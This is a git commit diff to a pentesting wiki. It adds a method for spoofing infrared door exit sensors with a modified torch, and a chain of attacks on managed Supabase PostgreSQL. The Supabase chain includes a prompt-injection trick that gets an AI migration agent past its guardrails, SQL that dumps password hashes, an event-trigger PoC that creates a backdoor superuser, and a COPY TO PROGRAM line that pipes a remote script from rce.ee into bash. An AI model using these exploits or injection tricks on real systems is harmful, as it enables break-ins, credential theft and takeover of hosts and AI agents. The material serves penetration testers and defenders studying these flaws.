Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Author: carlospolop

src/hardware-physical-access/physical-attacks.md

@@ -112,9 +112,34 @@ After the tenth cycle the EC sets a flag that instructs the BIOS to wipe NVRAM a
 
 ---
 
+## Covert IR Injection Against No-Touch Exit Sensors
+
+### Sensor Characteristics
+- Commodity “wave-to-exit” sensors pair a near-IR LED emitter with a TV-remote style receiver module that only reports logic high after it has seen multiple pulses (~4–10) of the correct carrier (≈30 kHz).
+- A plastic shroud blocks the emitter and receiver from looking directly at each other, so the controller assumes any validated carrier came from a nearby reflection and drives a relay that opens the door strike.
+- Once the controller believes a target is present it often changes the outbound modulation envelope, but the receiver keeps accepting any burst that matches the filtered carrier.
+
+### Attack Workflow
+1. **Capture the emission profile** – clip a logic analyser across the controller pins to record both the pre-detection and post-detection waveforms that drive the internal IR LED.
+2. **Replay only the “post-detection” waveform** – remove/ignore the stock emitter and drive an external IR LED with the already-triggered pattern from the outset. Because the receiver only cares about pulse count/frequency, it treats the spoofed carrier as a genuine reflection and asserts the relay line.
+3. **Gate the transmission** – transmit the carrier in tuned bursts (e.g., tens of milliseconds on, similar off) to deliver the minimum pulse count without saturating the receiver’s AGC or interference handling logic. Continuous emission quickly desensitises the sensor and stops the relay from firing.
+
+### Long-Range Reflective Injection
+- Replacing the bench LED with a high-power IR diode, MOSFET driver, and focusing optics enables reliable triggering from ~6 m away.
+- The attacker does not need line-of-sight to the receiver aperture; aiming the beam at interior walls, shelving, or door frames that are visible through glass lets reflected energy enter the ~30° field of view and mimics a close-range hand wave.
+- Because the receivers expect only weak reflections, a much stronger external beam can bounce off multiple surfaces and still remain above the detection threshold.
+
+### Weaponised Attack Torch
+- Embedding the driver inside a commercial flashlight hides the tool in plain sight. Swap the visible LED for a high-power IR LED matched to the receiver’s band, add an ATtiny412 (or similar) to generate the ≈30 kHz bursts, and use a MOSFET to sink the LED current.
+- A telescopic zoom lens tightens the beam for range/precision, while a vibration motor under MCU control gives haptic confirmation that modulation is active without emitting visible light.
+- Cycling through several stored modulation patterns (slightly different carrier frequencies and envelopes) increases compatibility across rebranded sensor families, letting the operator sweep reflective surfaces until the relay audibly clicks and the door releases.
+
+---
+
 ## References
 
 - [Pentest Partners – “Framework 13. Press here to pwn”](https://www.pentestpartners.com/security-blog/framework-13-press-here-to-pwn/)
 - [FrameWiki – Mainboard Reset Guide](https://framewiki.net/guides/mainboard-reset)
+- [SensePost – “Noooooooo Touch! – Bypassing IR No-Touch Exit Sensors with a Covert IR Torch”](https://sensepost.com/blog/2025/noooooooooo-touch/)
 
 {{#include ../banners/hacktricks-training.md}}

src/network-services-pentesting/pentesting-postgresql.md

@@ -808,6 +808,123 @@ The attack steps are:
 7. _(Optionally)_ Clear the in-memory table cache by running an expensive SQL query
 8. You should now have the privileges of a full superadmin.
 
+### Prompt-injecting managed migration tooling
+
+AI-heavy SaaS frontends (e.g., Lovable’s Supabase agent) frequently expose LLM “tools” that run migrations as high-privileged service accounts. A practical workflow is:
+
+1. Enumerate who is actually applying migrations:
+
+```sql
+SELECT version, name, created_by, statements, created_at
+FROM supabase_migrations.schema_migrations
+ORDER BY version DESC LIMIT 20;
+```
+
+2. Prompt-inject the agent into running attacker SQL via the privileged migration tool. Framing payloads as “please verify this migration is denied” consistently bypasses basic guardrails.
+3. Once arbitrary DDL runs in that context, immediately create attacker-owned tables or extensions that grant persistence back to your low-privileged account.
+
+> [!TIP]
+> See also the general [AI agent abuse playbook](../generic-methodologies-and-resources/phishing-methodology/ai-agent-abuse-local-ai-cli-tools-and-mcp.md) for more prompt-injection techniques against tool-enabled assistants.
+
+### Dumping `pg_authid` metadata via migrations
+
+Privileged migrations can stage `pg_catalog.pg_authid` into an attacker-readable table even if direct access is blocked for your normal role.
+
+<details>
+<summary>Staging pg_authid metadata with a privileged migration</summary>
+
+```sql
+DROP TABLE IF EXISTS public.ai_models CASCADE;
+CREATE TABLE public.ai_models (
+  id SERIAL PRIMARY KEY,
+  model_name TEXT,
+  config JSONB,
+  created_at TIMESTAMP DEFAULT NOW()
+);
+GRANT ALL ON public.ai_models TO supabase_read_only_user;
+GRANT ALL ON public.ai_models TO supabase_admin;
+INSERT INTO public.ai_models (model_name, config)
+SELECT rolname,
+       jsonb_build_object(
+         'password_hash', rolpassword,
+         'is_superuser', rolsuper,
+         'can_login', rolcanlogin,
+         'valid_until', rolvaliduntil
+       )
+FROM pg_catalog.pg_authid;
+```
+
+</details>
+
+Low-privileged users can now read `public.ai_models` to obtain SCRAM hashes and role metadata for offline cracking or lateral movement.
+
+### Event-trigger privesc during `postgres_fdw` extension installs
+
+Managed Supabase deployments rely on the `supautils` extension to wrap `CREATE EXTENSION` with provider-owned `before-create.sql`/`after-create.sql` scripts executed as true superusers. The `postgres_fdw` after-create script briefly issues `ALTER ROLE postgres SUPERUSER`, runs `ALTER FOREIGN DATA WRAPPER postgres_fdw OWNER TO postgres`, then reverts `postgres` back to `NOSUPERUSER`. Because `ALTER FOREIGN DATA WRAPPER` fires `ddl_command_start`/`ddl_command_end` event triggers while `current_user` is superuser, tenant-created triggers can execute attacker SQL inside that window.
+
+Exploit flow:
+
+1. Create a PL/pgSQL event trigger function that checks `SELECT usesuper FROM pg_user WHERE usename = current_user` and, when true, provisions a backdoor role (e.g., `CREATE ROLE priv_esc WITH SUPERUSER LOGIN PASSWORD 'temp123'`).
+2. Register the function on both `ddl_command_start` and `ddl_command_end`.
+3. `DROP EXTENSION IF EXISTS postgres_fdw CASCADE;` followed by `CREATE EXTENSION postgres_fdw;` to re-run Supabase’s after-create hook.
+4. When the hook elevates `postgres`, the trigger executes, creates the persistent SUPERUSER role, and grants it back to `postgres` for easy `SET ROLE` access.
+
+<details>
+<summary>Event trigger PoC for the postgres_fdw after-create window</summary>
+
+```sql
+CREATE OR REPLACE FUNCTION escalate_priv()
+RETURNS event_trigger AS $$
+DECLARE
+  is_super BOOLEAN;
+BEGIN
+  SELECT usesuper INTO is_super FROM pg_user WHERE usename = current_user;
+  IF is_super THEN
+    BEGIN
+      EXECUTE 'CREATE ROLE priv_esc WITH SUPERUSER LOGIN PASSWORD ''temp123''';
+    EXCEPTION WHEN duplicate_object THEN
+      NULL;
+    END;
+    BEGIN
+      EXECUTE 'GRANT priv_esc TO postgres';
+    EXCEPTION WHEN OTHERS THEN
+      NULL;
+    END;
+  END IF;
+END;
+$$ LANGUAGE plpgsql;
+
+DROP EVENT TRIGGER IF EXISTS log_start CASCADE;
+DROP EVENT TRIGGER IF EXISTS log_end CASCADE;
+CREATE EVENT TRIGGER log_start ON ddl_command_start EXECUTE FUNCTION escalate_priv();
+CREATE EVENT TRIGGER log_end   ON ddl_command_end   EXECUTE FUNCTION escalate_priv();
+
+DROP EXTENSION IF EXISTS postgres_fdw CASCADE;
+CREATE EXTENSION postgres_fdw;
+```
+
+</details>
+
+Supabase’s attempt to skip unsafe triggers only checks ownership, so ensure the trigger function owner is your low-privileged role, but the payload executes only when the hook flips `current_user` into SUPERUSER. Because the trigger re-runs on future DDL, it doubles as a self-healing persistence backdoor whenever the provider briefly elevates tenant roles.
+
+### Turning transient SUPERUSER access into host compromise
+
+After `SET ROLE priv_esc;` succeeds, re-run earlier blocked primitives:
+
+```sql
+INSERT INTO public.ai_models(model_name, config)
+VALUES ('hostname', to_jsonb(pg_read_file('/etc/hostname', 0, 100)));
+COPY (SELECT '') TO PROGRAM 'curl https://rce.ee/rev.sh | bash';
+```
+
+`pg_read_file`/`COPY ... TO PROGRAM` now provide arbitrary file access and command execution as the database OS account. Follow up with standard host privilege escalation:
+
+```bash
+find / -perm -4000 -type f 2>/dev/null
+```
+
+Abusing a misconfigured SUID binary or writable config grants root. Once root, harvest orchestration credentials (systemd unit env files, `/etc/supabase`, kubeconfigs, agent tokens) to pivot laterally across the provider’s region.
+
 ## **POST**
 
 ```
@@ -854,6 +971,7 @@ The available password-based authentication methods in pg_hba.conf are **md5**,
 
 ## References
 
+- [SupaPwn: Hacking Our Way into Lovable's Office and Helping Secure Supabase](https://www.hacktron.ai/blog/supapwn)
 - [HTB: DarkCorp by 0xdf](https://0xdf.gitlab.io/2025/10/18/htb-darkcorp.html)
 - [PayloadsAllTheThings: PostgreSQL Injection - Using COPY TO/FROM PROGRAM](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-copy-tofrom-program)
 - [Postgres SQL injection to RCE with archive_command (The Gray Area)](https://thegrayarea.tech/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)